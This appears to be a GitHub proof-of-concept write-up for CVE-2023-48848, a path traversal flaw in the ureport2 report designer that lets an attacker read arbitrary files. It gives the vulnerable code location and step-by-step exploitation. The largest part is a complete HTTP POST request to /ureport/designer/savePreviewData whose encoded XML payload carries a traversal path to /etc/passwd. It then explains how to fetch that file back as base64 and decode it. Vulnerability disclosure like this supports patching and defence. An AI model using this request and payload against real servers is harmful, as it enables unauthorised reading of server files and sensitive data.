CVE-2023-48848: GitHub - h00klod0er/ureport2-vuln

When inserting image files into the report, there are no restrictions on the format, path, etc. of the image, which allows malicious data to be submitted, causing arbitrary file reading vulnerabilities, and obtaining file contents and sensitive data on the server. The vulnerable code at file：ureport2-core-2.2.9.jar method：com.bstek.ureport.provider.image.DefaultImageProvider：

It was found that the program did not verify the obtained image path and directly spliced the obtained path into the FileInputStream method, causing an arbitrary file reading vulnerability.

Reproduce the local build environment: Use idea to build a Springboot demo project and introduce ureport2：

Exploiting the Vulnerability

Visit /ureport/designer/ Click the image button and set the path to /…/…/…/…/…/…/…/etc/passwd

Click the preview button

Then jump to /ureport/preview?_u=p, you can see a base64 encoded picture

Decrypt its base64 encoded content and obtain the contents of the /etc/passwd file.

The http message：

Content parameter content:

The base64 image content can be seen in the return package of /ureport/preview?_u=p

Poc content:

POST /ureport/designer/savePreviewData HTTP/1.1
Host: 192.168.100.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5796
Origin: http://192.168.100.171:8080
Connection: close
Referer: http://192.168.100.171:8080/ureport/designer/
Cookie: JSESSIONID=6041627D8F7E4701AA566790B40078A2

content=%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253Cureport%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A1%2522%2520row%253D%25221%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B1%2522%2520row%253D%25221%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C1%2522%2520row%253D%25221%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D1%2522%2520row%253D%25221%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A2%2522%2520row%253D%25222%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B2%2522%2520row%253D%25222%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C2%2522%2520row%253D%25222%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%25229%2522%2520forecolor%253D%25220%252C0%252C0%2522%2520font-family%253D%2522%25E5%25AE%258B%25E4%25BD%2593%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Cimage-value%2520source%253D%2522text%2522%253E%253Ctext%253E%253C!%255BCDATA%255B%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%255D%255D%253E%253C%252Ftext%253E%253C%252Fimage-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D2%2522%2520row%253D%25222%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A3%2522%2520row%253D%25223%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B3%2522%2520row%253D%25223%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C3%2522%2520row%253D%25223%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D3%2522%2520row%253D%25223%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Crow%2520row-number%253D%25221%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25222%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25223%2522%2520height%253D%252218%2522%252F%253E%253Ccolumn%2520col-number%253D%25221%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25222%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25223%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25224%2522%2520width%253D%252280%2522%252F%253E%253Cpaper%2520type%253D%2522A4%2522%2520left-margin%253D%252290%2522%2520right-margin%253D%252290%2522%250A%2520%2520%2520%2520top-margin%253D%252272%2522%2520bottom-margin%253D%252272%2522%2520paging-mode%253D%2522fitpage%2522%2520fixrows%253D%25220%2522%250A%2520%2520%2520%2520width%253D%2522595%2522%2520height%253D%2522842%2522%2520orientation%253D%2522portrait%2522%2520html-report-align%253D%2522left%2522%2520bg-image%253D%2522%2522%2520html-interval-refresh-value%253D%25220%2522%2520column-enabled%253D%2522false%2522%253E%253C%252Fpaper%253E%253C%252Fureport%253E

Send the following request packet and obtain the JSESSIONID part of the Set-Cookie field in the header of the returned packet.

Use the obtained JSESSIONID as a cookie to access /ureport/preview?_u=p, and you can obtain the base64 encoded content of /etc/passwd in the img tag in the returned content.

Decrypt this base64 to get the actual content of /etc/passwd